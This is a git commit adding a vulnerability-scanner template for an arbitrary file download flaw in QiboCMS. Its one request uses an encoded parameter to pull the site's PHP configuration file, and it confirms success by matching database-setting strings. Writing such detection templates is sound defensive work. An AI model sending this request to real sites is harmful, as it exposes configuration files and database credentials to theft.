Create qibocms-file-download.yaml

patch-1
Abhinav Gaur 2022-12-12 21:06:09 +05:30 committed by GitHub
parent 1574d7d589
commit 221b253406
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
id: qibocms-file-download
info:
name: qibocms file download- arbitary file download
author: theabhinavgaur
severity: high
tags: qibocms-file-download
requests:
- method: GET
path:
- "{{BaseURL}}/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?php"
- "$webdb"
condition: and
- type: status
status:
- 200